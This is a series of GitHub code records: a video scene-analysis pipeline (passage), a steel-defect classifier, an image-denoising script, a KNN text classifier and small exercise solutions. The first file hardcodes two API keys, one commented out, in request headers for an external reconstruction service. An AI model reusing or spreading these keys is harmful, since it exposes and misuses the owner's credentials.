= segvalues['ratios'][o] / 100\n # objects_info.append(objects_dict)\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # Check if there is \"building\" or \"wall\" and get their ratios\n if segvalues['class_names'][o] == \"building\":\n building_class = True\n building_ratio = segvalues['ratios'][o] #0-100\n elif segvalues['class_names'][o] == \"wall\":\n wall_class = True\n wall_ratio = segvalues['ratios'][o] #0-100\n\n else:\n for o in range(0, len(segvalues['class_names'])):\n if segvalues['class_names'][o] in predictors.wanted_ade20k_labels and segvalues['ratios'][o] > 1:\n objects_dict = {}\n objects_dict['type'] = segvalues['class_names'][o]\n objects_dict['probability'] = segvalues['ratios'][o] / 100\n shot_info_dict_KB['objectsFound'].append(objects_dict)\n\n # Check if there is \"building\" or \"wall\" and get their ratios\n if segvalues['class_names'][o] == \"building\":\n building_class = True\n building_ratio = segvalues['ratios'][o] # 0-100\n elif segvalues['class_names'][o] == \"wall\":\n wall_class = True\n wall_ratio = segvalues['ratios'][o] # 0-100\n\n frame_counter = frame_counter + 1\n\n # Check if we should extract output for the 3D reconstruction service\n if is_outdoor and sr_prob >= 9.5 and scene != \"bar\" and scene != \"restaurant\" and \\\n ((building_class and building_ratio >= 8) or (wall_class and wall_ratio >= 8)):\n\n # Blurriness check\n frame_resized = imutils.resize(frame, width=500)\n gray_frame = cv2.cvtColor(frame_resized, cv2.COLOR_BGR2GRAY)\n\n # apply our blur detector using the FFT\n (mean, blurry) = detect_blur_fft(gray_frame, size=60,\n thresh=blur_avg-2)\n\n print(\"---> Detecting bluriness - Mean: \", mean)\n logging.info(\"---> Detecting bluriness - Mean: \", mean)\n\n if blurry:\n print(\"^^^^^Blurry frame detected!^^^^^\")\n logging.info(\"^^^^^Blurry frame detected!^^^^^\")\n else:\n # Current frame was selected to be sent to 3D reconstruction service\n frames_for_rec_num = frames_for_rec_num + 1\n\n # Create output image for 3D reconstruction\n h, w, n = frame.shape\n\n blur_mask = np.zeros(shape=(h, w), dtype=np.uint8)\n remove_mask = np.zeros(shape=(h, w), dtype=np.uint8)\n\n for i in range(0, len(objects_masks)):\n print(objects_masks[i]['class_name'])\n logging.info(objects_masks[i]['class_name'])\n\n if objects_masks[i]['class_name'] in remove_classes:\n\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to remove_mask\n remove_mask = remove_mask + new_mask\n\n # if there is a great coverage of \"building\", remove \"mountain\"\n elif objects_masks[i]['class_name'] == \"mountain\" and building_ratio >= 50:\n\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to remove_mask\n remove_mask = remove_mask + new_mask\n\n if objects_masks[i]['class_name'] in blur_classes:\n mask = objects_masks[i]['masks']\n mask = mask.astype(np.uint8)\n mask[mask == 1] = 255\n\n new_mask = cv2.resize(mask, (w, h), interpolation=cv2.INTER_LINEAR)\n\n # Add this mask to blur_mask\n blur_mask = blur_mask + new_mask\n\n # Blur specific objects\n img = frame.copy()\n blur_img = cv2.blur(frame, (21, 21), 0)\n blur_mask_3d = cv2.merge((blur_mask, blur_mask, blur_mask))\n out = np.where(blur_mask_3d, blur_img, img)\n\n # Keep only the foreground in image\n inv_remove_mask = cv2.bitwise_not(remove_mask)\n\n # Remove noise from mask with dilation and erosion\n # Taking a matrix of size 5 as the kernel\n kernel = np.ones((5, 5), np.uint8)\n\n # The first parameter is the original image,\n # kernel is the matrix with which image is\n # convolved and third parameter is the number\n # of iterations, which will determine how much\n # you want to erode/dilate a given image.\n inv_remove_mask_eros = cv2.erode(inv_remove_mask, kernel, iterations=10)\n inv_remove_mask_denoised = cv2.dilate(inv_remove_mask_eros, kernel, iterations=10)\n\n # for r in range(0, 5):\n # kernel = np.ones((7, 7), np.uint8) # TODO: Best kernel size?\n # inv_remove_mask_denoised = cv2.morphologyEx(inv_remove_mask, cv2.MORPH_OPEN, kernel)\n\n # Combine blurring & masking\n out2 = cv2.bitwise_and(out, out, mask=inv_remove_mask_denoised)\n\n # Create a separate folder for the processed frames of each video shot\n os.makedirs(proc_frames_path + \"shot\" + str(shot_idx), exist_ok=True)\n\n cv2.imwrite(proc_frames_path + \"shot\" + str(shot_idx) + \"/frame_\" + str(frame_idx) + \"_processed.jpg\", out2)\n\n # Upload processed frame to file storage\n url = \"http://xr4drama.iti.gr:5002/fileUpload/processed_images\"\n # Open the image in read-only format.\n file = {'file': open(proc_frames_path + \"shot\" + str(shot_idx) + \"/frame_\" + str(frame_idx) + \"_processed.jpg\", 'rb')}\n uploaded_file_url = WebFunctions.send_post(url, file, False)\n print(\"Processed frame url: \", uploaded_file_url)\n logging.info(\"Processed frame url: \", uploaded_file_url)\n frame_info_dict_3D_rec[\"procFrameUrl\"] = uploaded_file_url\n\n # Add extracted information for this frame to the 3D Rec dictionary\n shot_info_dict_3D_rec[\"frameInfo\"].append(frame_info_dict_3D_rec.copy())\n\n # Dominant Scene - Majority voting\n c = Counter(scenes)\n dominant_scene = c.most_common(1) # finds most common scene detected in the frames of the analyzed shot\n\n if len(dominant_scene) == 0:\n dominant_scene.append(('none', 0))\n\n shot_info_dict_KB[\"area\"] = dominant_scene[0][0]\n # shot_info_dict_Rec[\"area\"] = dominant_scene[0][0]\n # shot_json[\"shots_info\"][shot_idx][\"outdoor\"] = True\n # shot_json[\"shots_info\"][shot_idx][\"scene_recognized\"] = dominant_scene[0][0]\n print(\"[INFO] Scene Recognized in shot {} : {} - ({}/{})\".format(shot_idx, dominant_scene[0][0], dominant_scene[0][1], frame_counter))\n logging.info(\"Scene Recognized in shot {} : {} - ({}/{})\".format(shot_idx, dominant_scene[0][0], dominant_scene[0][1], frame_counter))\n\n # Avg probability of Dominant Scene\n # print(dominant_scene[0][0])\n indices = [i for i, s in enumerate(scenes) if dominant_scene[0][0] in s]\n # print(indices)\n sum_sr_probs = 0\n for idx in indices:\n sum_sr_probs = sum_sr_probs + float(sr_probs[idx])\n\n if dominant_scene[0][1] == 0:\n avg_sr_prob = 0\n else:\n avg_sr_prob = sum_sr_probs / dominant_scene[0][1]\n shot_info_dict_KB[\"areaProb\"] = avg_sr_prob/100\n # shot_info_dict_Rec[\"areaProb\"] = avg_sr_prob / 100\n print(\"----- Avg SR Probability: {}%\".format(avg_sr_prob))\n logging.info(\"----- Avg SR Probability: {}%\".format(avg_sr_prob))\n # shot_json[\"shots_info\"][shot_idx][\"scene_prob\"] = avg_sr_prob\n\n # Characterize analyzed scene as \"outdoors\" or \"indoors\"\n c = Counter(are_outdoor)\n outdoor_instances = c.most_common(1)\n\n if len(outdoor_instances) == 0:\n outdoor_instances.append(('none', 0))\n\n outdoor = outdoor_instances[0][0]\n shot_info_dict_KB[\"outdoor\"] = outdoor\n # shot_info_dict_Rec[\"outdoor\"] = outdoor\n if outdoor:\n print(\"----- Scene is characterized as Outdoor.\")\n logging.info(\"----- Scene is characterized as Outdoor.\")\n else:\n print(\"----- Scene is characterized as Indoor.\")\n logging.info(\"----- Scene is characterized as Indoor.\")\n\n # Dominant emergency situation and avg probability ToDo: It now outputs dummy results!! Add beAware model for EmC\n c = Counter(emergencies)\n dominant_emergency = c.most_common(1)\n\n if len(dominant_emergency) == 0:\n dominant_emergency.append(('none', 0))\n\n shot_info_dict_KB[\"emergencyType\"] = dominant_emergency[0][0]\n print(\"[INFO] Emergency type in shot: \", dominant_emergency[0][0])\n logging.info(\"Emergency type in shot: \", dominant_emergency[0][0])\n\n # Avg probability of Dominant Emergency Type\n indices = [i for i, s in enumerate(emergencies) if dominant_emergency[0][0] in s]\n # print(indices)\n sum_emc_probs = 0\n for idx in indices:\n sum_emc_probs = sum_emc_probs + float(emc_probs[idx])\n\n if dominant_emergency[0][1] == 0:\n avg_emc_prob = 0\n else:\n avg_emc_prob = sum_emc_probs / dominant_emergency[0][1]\n shot_info_dict_KB[\"emergencyProb\"] = avg_emc_prob\n # shot_json[\"shots_info\"][shot_idx][\"emergency_type\"] = dominant_emergency[0][0]\n # shot_json[\"shots_info\"][shot_idx][\"emergency_prob\"] = avg_emc_prob\n print('----- Avg Emergency Probability: {}%'.format(avg_emc_prob))\n logging.info('----- Avg Emergency Probability: {}%'.format(avg_emc_prob))\n\n # Finalise the output JSON for KB\n # print(shot_info_dict_KB)\n #\n KB_JSON[\"shotInfo\"].append(shot_info_dict_KB)\n\n print(KB_JSON[\"shotInfo\"][shot_idx])\n logging.info(KB_JSON[\"shotInfo\"][shot_idx])\n\n if frames_for_rec_num >= 5:\n # Update output JSON for 3D Reconstruction\n Rec_JSON[\"shotInfo\"].append(shot_info_dict_3D_rec)\n\n print(Rec_JSON[\"shotInfo\"][-1])\n logging.info(Rec_JSON[\"shotInfo\"][-1])\n\n # Save KB_JSON file\n with open(video_path + entity + '_' + simmoid + \"_\" + 'KB.json', 'w') as f:\n json.dump(KB_JSON, f)\n\n # Save output for KB (maybe this will be inside the analysis function)\n db.ImagesDB.VisualsOutputKB.insert_one(KB_JSON)\n # db.XR4D_Visual_Analysis_DB.VisualsOutputKB.insert_one(KB_JSON)\n\n if sendtoKB:\n print(\"\\n[INFO] Sending output to KB...\")\n logging.info(\"\\nSending output to KB...\")\n\n # /population/VISUAL_ANALYSIS\n\n # Save Rec_JSON file\n with open(video_path + entity + '_' + simmoid + \"_\" + \"Rec.json\", 'w') as f:\n json.dump(Rec_JSON, f)\n\n # Save output for KB (maybe this will be inside the analysis function)\n db.ImagesDB.VisualsOutput3D.insert_one(Rec_JSON)\n # db.XR4D_Visual_Analysis_DB.VisualsOutput3D.insert_one(Rec_JSON)\n\n if sendtoRec:\n print(\"\\n[INFO] Sending output to 3D Reconstruction...\")\n logging.info(\"\\nSending output to 3D Reconstruction...\")\n\n # Send Rec_JSON to the 3D Reconstruction service\n base_url = \"https://baremetal.up2metric.com/\"\n\n rec_file = open(video_path + entity + '_' + simmoid + \"_\" + \"Rec.json\", \"r\")\n payload = json.load(rec_file)\n\n headers = {\n 'api_key': '2gLTq6KTBFCevaXlQ7lEva-pylNfSqy6MUQpr1n26BGDOqut8K7en4IuxV6S2r7KJ9SuWOyvD7oihBy7pqZKAA',\n # 'oCxNWXZYI5ksEno0Bb8Nf_Os4vgaqf0R07MwElmbKR-xiKpZLAphlcLJW76IYKYITYn_cLTiE5xGYeeIocd4Fw',\n 'Content-Type': 'application/json'\n }\n\n response = requests.post(base_url + \"jobs/json\", headers=headers, json=payload)\n print(response.text)\n logging.info(response.text)\n print(response.status_code)\n logging.info(response.status_code)\n\n #### ====== Create Log File ====== ####\n # Get date and time that current analysis ends\n moment = str(datetime.now(tz=None))\n\n # Get current log data\n with open(\"logfilename.log\", \"r\") as f:\n logs = f.read()\n\n # Create current log dictionairy\n new_log_data = {}\n new_log_data[\"moment\"] = moment\n new_log_data[\"message\"] = logs\n\n # Get all logs until now\n\n # Check if log file exists\n file_exists = exists(\"full_log_file.json\")\n if not file_exists:\n open(\"full_log_file.json\", \"w\")\n\n # Check if log file is empty\n if os.stat(\"full_log_file.json\").st_size == 0:\n print('Log File is empty')\n\n full_log_list = []\n full_log_list.append(new_log_data)\n\n with open(\"full_log_file.json\", \"w\") as file:\n json.dump(full_log_list, file)\n\n else:\n print('Log File is not empty')\n\n with open(\"full_log_file.json\", \"r\") as file_read:\n past_log_data = json.load(file_read)\n\n past_log_data.append(new_log_data)\n\n with open(\"full_log_file.json\", \"w\") as file_write:\n json.dump(past_log_data, file_write)\n\n\n\n\n","repo_name":"DoraPist/xR4D_Visual_Analysis","sub_path":"visual_analysis_functions_v1.py","file_name":"visual_analysis_functions_v1.py","file_ext":"py","file_size_in_byte":46053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"468484239","text":"import numpy as np\nimport pandas as pd\nimport cv2\nfrom torchvision import models\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport os\nimport re\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport itertools\nimport torch\nfrom tqdm import tqdm\nfrom albumentations.pytorch.transforms import ToTensor\nfrom albumentations import (\n PadIfNeeded,\n HorizontalFlip,\n VerticalFlip,\n CenterCrop,\n Crop,\n Compose,\n Transpose,\n RandomRotate90,\n ElasticTransform,\n GridDistortion,\n OpticalDistortion,\n RandomSizedCrop,\n OneOf,\n CLAHE,\n RandomBrightnessContrast,\n RandomGamma,\n Normalize\n)\nfrom torch.nn import functional as F\nBatchNorm2d = nn.BatchNorm2d\n\n###############################################################################\nclass ConvBn2d(nn.Module):\n\n def __init__(self, in_channel, out_channel, kernel_size=3, padding=1, stride=1):\n super(ConvBn2d, self).__init__()\n self.conv = nn.Conv2d(in_channel, out_channel, kernel_size=kernel_size, padding=padding, stride=stride, bias=False)\n self.bn = nn.BatchNorm2d(out_channel, eps=1e-5)\n\n def forward(self,x):\n x = self.conv(x)\n x = self.bn(x)\n return x\n\n\n\n\n############# resnext50 pyramid feature net #######################################\n# https://github.com/Hsuxu/ResNeXt/blob/master/models.py\n# https://github.com/D-X-Y/ResNeXt-DenseNet/blob/master/models/resnext.py\n# https://github.com/miraclewkf/ResNeXt-PyTorch/blob/master/resnext.py\n\n\n# bottleneck type C\nclass BasicBlock(nn.Module):\n def __init__(self, in_channel, channel, out_channel, stride=1, is_shortcut=False):\n super(BasicBlock, self).__init__()\n self.is_shortcut = is_shortcut\n\n self.conv_bn1 = ConvBn2d(in_channel, channel, kernel_size=3, padding=1, stride=stride)\n self.conv_bn2 = ConvBn2d( channel,out_channel, kernel_size=3, padding=1, stride=1)\n\n if is_shortcut:\n self.shortcut = ConvBn2d(in_channel, out_channel, kernel_size=1, padding=0, stride=stride)\n\n\n def forward(self, x):\n z = F.relu(self.conv_bn1(x),inplace=True)\n z = self.conv_bn2(z)\n\n if self.is_shortcut:\n x = self.shortcut(x)\n\n z += x\n z = F.relu(z,inplace=True)\n return z\n\n\n\n\nclass ResNet34(nn.Module):\n\n def __init__(self, num_class=1000 ):\n super(ResNet34, self).__init__()\n\n\n self.block0 = nn.Sequential(\n nn.Conv2d(3, 64, kernel_size=7, padding=3, stride=2, bias=False),\n BatchNorm2d(64),\n nn.ReLU(inplace=True),\n )\n self.block1 = nn.Sequential(\n nn.MaxPool2d(kernel_size=3, padding=1, stride=2),\n BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,),\n * [BasicBlock( 64, 64, 64, stride=1, is_shortcut=False,) for i in range(1,3)],\n )\n self.block2 = nn.Sequential(\n BasicBlock( 64,128,128, stride=2, is_shortcut=True, ),\n * [BasicBlock(128,128,128, stride=1, is_shortcut=False,) for i in range(1,4)],\n )\n self.block3 = nn.Sequential(\n BasicBlock(128,256,256, stride=2, is_shortcut=True, ),\n * [BasicBlock(256,256,256, stride=1, is_shortcut=False,) for i in range(1,6)],\n )\n self.block4 = nn.Sequential(\n BasicBlock(256,512,512, stride=2, is_shortcut=True, ),\n * [BasicBlock(512,512,512, stride=1, is_shortcut=False,) for i in range(1,3)],\n )\n self.logit = nn.Linear(512,num_class)\n\n\n\n def forward(self, x):\n batch_size = len(x)\n\n x = self.block0(x)\n x = self.block1(x)\n x = self.block2(x)\n x = self.block3(x)\n x = self.block4(x)\n x = F.adaptive_avg_pool2d(x,1).reshape(batch_size,-1)\n logit = self.logit(x)\n return logit\n\nclass Resnet34_classification(nn.Module):\n def __init__(self,num_class=4):\n super(Resnet34_classification, self).__init__()\n e = ResNet34()\n self.block = nn.ModuleList([\n e.block0,\n e.block1,\n e.block2,\n e.block3,\n e.block4,\n ])\n e = None #dropped\n self.feature = nn.Conv2d(512,32, kernel_size=1) #dummy conv for dim reduction\n self.logit = nn.Conv2d(32,num_class, kernel_size=1)\n\n def forward(self, x):\n batch_size,C,H,W = x.shape\n\n for i in range( len(self.block)):\n x = self.block[i](x)\n #print(i, x.shape)\n\n x = F.dropout(x,0.5,training=self.training)\n x = F.adaptive_avg_pool2d(x, 1)\n x = self.feature(x)\n logit = self.logit(x)\n return logit\n\n\nclass SteelDataset(Dataset):\n def __init__(self):\n self.root = 'input/severstal-steel-defect-detection/'\n\n def get_df():\n train_df = pd.read_csv('input/severstal-steel-defect-detection/train.csv')\n labels = []\n for i in range(len(train_df)):\n if type(train_df.EncodedPixels[i]) == str:\n labels.append(1)\n else:\n labels.append(0)\n labels = np.array(labels)\n labels = labels.reshape((int(len(train_df) / 4), 4))\n\n images_df = pd.DataFrame(train_df.iloc[::4, :].ImageId_ClassId.str[:-2].reset_index(drop=True))\n labels_df = pd.DataFrame(labels)\n proc_train_df = pd.concat((images_df, labels_df), 1)\n\n return proc_train_df\n self.train_df = get_df()\n\n def __len__(self):\n return self.train_df.shape[0]\n\n def __getitem__(self, idx):\n file = self.train_df.iloc[idx].values[0]\n file_path = os.path.join((self.root + 'train_images'), file)\n image = cv2.imread(file_path)\n\n mean = (0.485, 0.456, 0.406)\n std = (0.229, 0.224, 0.225)\n train_aug = Compose([\n # PadIfNeeded(min_height=256, min_width=1600, p=1),\n VerticalFlip(p=0.5),\n HorizontalFlip(p=0.5),\n Normalize(mean=mean, std=std, p=1),\n ToTensor()])\n\n augmented = train_aug(image=image)\n image = augmented['image']\n label = torch.tensor(np.array(self.train_df.iloc[idx].values[1:], dtype=np.float32))\n return image, label\n\n\nclass Train_Model(object):\n def __init__(self):\n self.model = None\n self.optimizer = None\n self.scheduler = None\n\n self.train_loader = None\n self.val_loader = None\n self.train_data = None\n self.val_data = None\n\n self.save_path = 'output/weights'\n\n self.num_epochs = 100\n self.batch_size = 16\n self.learning_rate = 0.001\n self.weight_decay = 1e-3\n\n def train(self):\n current_loss, current_acc = 0, 0\n\n self.model.train()\n for image, label in tqdm(self.train_loader, total=len(self.train_loader), ascii=True, desc='train'):\n image = image.cuda()\n label = label.cuda()\n self.optimizer.zero_grad()\n\n with torch.set_grad_enabled(True):\n outputs = self.model(image)\n batch_size, num_class, H, W = outputs.shape\n outputs = outputs.view(batch_size, num_class)\n label = label.view(batch_size, num_class)\n loss = F.binary_cross_entropy_with_logits(outputs, label, reduction='none')\n loss = loss.mean()\n\n loss.backward()\n self.optimizer.step()\n\n # print('gradients =', [x.grad.data for x in model.parameters()])\n # _, predictions = torch.max(outputs, 1)\n # print('weights after backpropagation = ', list(model.parameters()))\n current_loss += loss.item() * image.size(0)\n current_acc += torch.sum(outputs.data == label.data)\n total_loss = current_loss / len(self.train_loader.dataset)\n total_acc = 100 * current_acc.double() / len(self.train_loader.dataset)\n print('TRAIN: Loss: {}, Accuracy: {}%'.format(total_loss, total_acc))\n return total_loss\n\n def validation(self):\n losses, all_predicted, all_labels = [], [], []\n total, correct = 0, 0\n\n self.model.eval()\n for (image, label) in tqdm(self.val_loader, total=len(self.val_loader), ascii=True, desc='validation'):\n image = image.cuda()\n label = label.cuda()\n with torch.set_grad_enabled(False):\n outputs = self.model(image)\n batch_size, num_class, H, W = outputs.shape\n outputs = outputs.view(batch_size, num_class)\n label = label.view(batch_size, num_class)\n loss = F.binary_cross_entropy_with_logits(outputs, label, reduction='none')\n loss = loss.mean()\n\n losses.append(loss.item())\n total += label.size(0)\n all_predicted.append(outputs.cpu().numpy())\n all_labels.append(label.cpu().numpy())\n correct += (outputs == label).sum().item()\n mean_loss = np.mean(losses)\n print('VALIDATION: Loss: '\n '{}, Accuracy: {}%'.format(mean_loss, (correct/total) * 100))\n return mean_loss, list(itertools.chain.from_iterable(all_predicted)), list(itertools.chain.from_iterable(all_labels))\n\n def training(self):\n for epoch in range(self.num_epochs):\n print(\"Epoch:[{}/{}]\".format(epoch + 1, self.num_epochs))\n self.train()\n val_loss, predicted, labels = self.validation()\n self.scheduler.step(val_loss)\n torch.save(self.model.state_dict(), self.save_path + '/cl2_resnet34.pth')\n\n def main(self):\n self.model = Resnet34_classification()\n self.model = self.model.to('cuda:0')\n self.optimizer = torch.optim.Adam(self.model.parameters(),\n lr=self.learning_rate,\n weight_decay=self.weight_decay)\n self.scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, mode=\"min\", patience=2, verbose=True)\n\n data_set = SteelDataset()\n validation_split = 0.2\n shuffle_dataset = True\n random_seed = 42\n dataset_size = len(data_set)\n indices = list(range(dataset_size))\n split = int(np.floor(validation_split * dataset_size))\n if shuffle_dataset:\n np.random.seed(random_seed)\n np.random.shuffle(indices)\n train_indices, val_indices = indices[split:], indices[:split]\n\n train_sampler = SubsetRandomSampler(train_indices)\n valid_sampler = SubsetRandomSampler(val_indices)\n\n self.train_loader = torch.utils.data.DataLoader(data_set,\n sampler=train_sampler,\n batch_size=self.batch_size,\n num_workers=6,\n pin_memory=True,\n shuffle=False)\n\n self.val_loader = torch.utils.data.DataLoader(data_set,\n sampler=valid_sampler,\n batch_size=self.batch_size,\n num_workers=6,\n pin_memory=True,\n shuffle=False)\n self.training()\n\n\nif __name__ == '__main__':\n model = Train_Model()\n model.main()\n","repo_name":"Keleas/severstal_kaggle","sub_path":"[Keleas] src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":11717,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9752903479","text":"import sys\nsys.stdin = open('input.txt')\n\nt = int(input())\n# button = {'A': 300, 'B': 60, 'C': 10}\nbutton = {'A': 0, 'B': 0, 'C': 0}\n\n\ntmp = t\nwhile True:\n if tmp == 0:\n print(*list(button.values()))\n break\n elif tmp < 10:\n print(-1)\n break\n\n elif tmp >= 300:\n tmp = tmp - 300\n button['A'] += 1\n # print(tmp, '300')\n\n elif tmp >= 60:\n tmp = tmp - 60\n button['B'] += 1\n # print(tmp, '60')\n\n elif tmp >= 10:\n tmp = tmp - 10\n button['C'] += 1\n # print(tmp, '10')\n","repo_name":"seulgi-mun/Algorithm","sub_path":"Python/Baekjoon/10162_전자레인지.py","file_name":"10162_전자레인지.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12074559179","text":"import cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\n#Denoising of Image:\r\n\r\nimg=cv2.imread(\"CamCann/Noisy.jpg\")\r\n#Image denoising can be done by either averaging the value of the pixels,or by normal blurring or by gaussian blurring or median blurring.\r\n\r\n#Median blur produces the best denoised image but reduces the clearity.\r\n\r\n#One can also apply morphological transformations such as erosion or dilation to perform the smoothing and denoising of the image /video.\r\n\r\n#Basic of all is that we use mask or kernel of a required size convolve it by moving it over the image.\r\nkernel=np.ones((5,5),np.float32)/25\r\ndenoised=cv2.filter2D(img,-1,kernel)\r\n\r\n#Applying Gaussian Blur to filter noise in the image\r\ngaussian_blr=cv2.GaussianBlur(img,(15,15),0)\r\n\r\n#Applying median blur to filter noise in the image\r\nmedian_blr=cv2.medianBlur(img,15)\r\n\r\n#Output:\r\ncv2.imshow(\"denoised\",denoised)\r\ncv2.imshow(\"Original\",img)\r\ncv2.imshow(\"Gaussian Blur\",gaussian_blr)\r\ncv2.imshow(\"Median Blur\",median_blr)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n#Denoising of Video:\r\n\r\nvid=cv2.VideoCapture(0)\r\nwhile True:\r\n _, frame = vid.read()\r\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\r\n\r\n#Applying Gaussian Blur to filter noise in the video\r\n denoise_1=cv2.GaussianBlur(frame,(7,7),0)\r\n#Applying median blur to filter noise in the video\r\n denoise_2=cv2.medianBlur(frame,7)\r\n cv2.imshow('Original',frame)\r\n cv2.imshow('Denoised_1',denoise_1)\r\n cv2.imshow('Denoised_2',denoise_2)\r\n\r\n k = cv2.waitKey(5) & 0xFF\r\n if k == 27:\r\n break\r\n\r\ncv2.destroyAllWindows()\r\ncap.release()\r\n","repo_name":"ksagrawal143/Denoising-Of-Image-Video","sub_path":"CamCannOCV.py","file_name":"CamCannOCV.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40220628958","text":"\"\"\"\nWrite a Python program to test whether a passed letter is a vowel or not.\n\"\"\"\n\n#our shitty code: :/ \ni=input(\"enter>>>>\")\n\nwovel=\"a\",\"e\",\"u\",\"i\",\"o\"\n\nif i in wovel:\n print(\"vovel\")\nelse:\n print(\"not\")\n \n#%% \ndef is_vowel(char):\n all_vowels = 'aeiou'\n return char in all_vowels\nprint(is_vowel('c'))\nprint(is_vowel('e'))\n\n\n#%% shorter!\nletter = input('Please enter ')\n\n\nif letter in 'aeiou':\n print('The letter is a vowel!')\nelse:\n print('The letter is not a vowel.')\n \n #%%\nimport re\nc=input(\"enter>>>>\")\n\nif re.match(\"[aeiou]\",c):\n print( \"wovel\")\nelse:\n print(\"not\")\n \n","repo_name":"deni-13/coding-challenges","sub_path":"mixed_ex/basics/1 (7).py","file_name":"1 (7).py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3073657779","text":"import jieba\nimport pandas as pd\nimport random\nimport numpy as np\nimport time\nfrom datetime import timedelta\nimport os\nimport itertools\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.externals import joblib\nfrom textDataProcess.dataload import move_stop_word\n\n\ndef get_time_dif(start_time):\n \"\"\"获取已使用时间\"\"\"\n end_time = time.time()\n time_dif = end_time - start_time\n return timedelta(seconds=int(round(time_dif)))\n\n\ndef tokenizer(s):\n words = []\n cut = jieba.cut(s)\n for word in cut:\n if_stop = move_stop_word(word)\n if if_stop:\n words.append(word)\n return words\n\n\ndef evaluate(y_preds, y_labels):\n num = 0\n count = 0\n for pred, label in zip(y_preds, y_labels):\n count = count + 1\n if pred == label:\n num = num + 1\n\n return float(num / count)\n\n\ndef train(contents, labels, save_dir, k):\n # 打乱样本与标签排序\n state = np.random.get_state()\n np.random.shuffle(contents)\n np.random.set_state(state)\n np.random.shuffle(labels)\n sep = int(len(contents) / 3 * 2)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n model_path = os.path.join(save_dir, 'trainModel.pkl')\n tf_idf_feature_path = os.path.join(save_dir, 'tfIdfFeature.pkl')\n\n start_time = time.time()\n form = pd.DataFrame(columns=['contents', 'labels'])\n for content, label in zip(contents, labels):\n form.loc[len(form)] = [content.strip(), label]\n count = CountVectorizer(tokenizer=tokenizer)\n count_vector = count.fit_transform(form.iloc[:, 0]).toarray()\n count_vector_train = count_vector[:sep]\n count_vector_val = count_vector[sep:]\n joblib.dump(count.vocabulary_, tf_idf_feature_path)\n model = KNeighborsClassifier(k)\n model.fit(count_vector_train, form.iloc[:sep, 1].values)\n joblib.dump(model, model_path)\n time_dif = get_time_dif(start_time)\n\n y_evaluate = model.predict(count_vector_val)\n acc_val = evaluate(y_evaluate, form.iloc[sep:, 1].values)\n return acc_val, time_dif\n\n\ndef test(test_data, save_dir):\n model_path = os.path.join(save_dir, 'trainModel.pkl')\n tf_idf_feature_path = os.path.join(save_dir, 'tfIdfFeature.pkl')\n\n start_time = time.time()\n loaded_vec = CountVectorizer(tokenizer=tokenizer, vocabulary=joblib.load(open(tf_idf_feature_path, \"rb\")))\n form = pd.DataFrame(columns=['content'])\n form.loc[len(form)] = [test_data.strip()]\n count_vector = loaded_vec.transform(form.iloc[:, 0]).toarray()\n index = len(count_vector)\n model = joblib.load(model_path)\n y_prediction = model.predict(count_vector[[index - 1]])\n time_dif = get_time_dif(start_time)\n\n return y_prediction, time_dif","repo_name":"BUPT902-Machine-Learning/Server","sub_path":"Machinelearning/textCoreAlgorithm/algorithm_KNN/run_knn.py","file_name":"run_knn.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"657793076","text":"class Solution:\n #TC:O(n) SC:O(n)\n def containsDuplicate(self, nums: List[int]) -> bool:\n result = set()\n\n for num in nums :\n result.add(num)\n\n if len(result) == len(nums) :\n return False\n else :\n return True\n","repo_name":"SeungyeonKang/LeetCode","sub_path":"easy/217. Contains Duplicate.py","file_name":"217. Contains Duplicate.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28483916854","text":"# https://leetcode.com/problems/convert-sorted-list-to-binary-search-tree/description/\n\nclass Solution:\n def sortedListToBST(self, head: Optional[ListNode]) -> Optional[TreeNode]:\n nums = []\n while head:\n nums.append(head.val)\n head = head.next\n \n def construct(left, right):\n if left > right:\n return None\n \n mid = (left + right) // 2\n return TreeNode(\n val = nums[mid],\n left = construct(left, mid - 1),\n right = construct(mid + 1, right)\n )\n \n return construct(0, len(nums) - 1)\n \n","repo_name":"nawrazi/competitive-programming","sub_path":"week_49/convert-sorted-list-to-bst.py","file_name":"convert-sorted-list-to-bst.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4377990269","text":"import mesa\n\nfrom rescue_robots.agents import FirstAidRobot, ExplorerDrone, Patient\nfrom rescue_robots.model import RescueRobots\n\n\ndef rescue_robot_portrayal(agent):\n if agent is None:\n return\n\n portrayal = {}\n\n if type(agent) is ExplorerDrone:\n portrayal[\"Shape\"] = \"rescue_robots/resources/droned.png\"\n 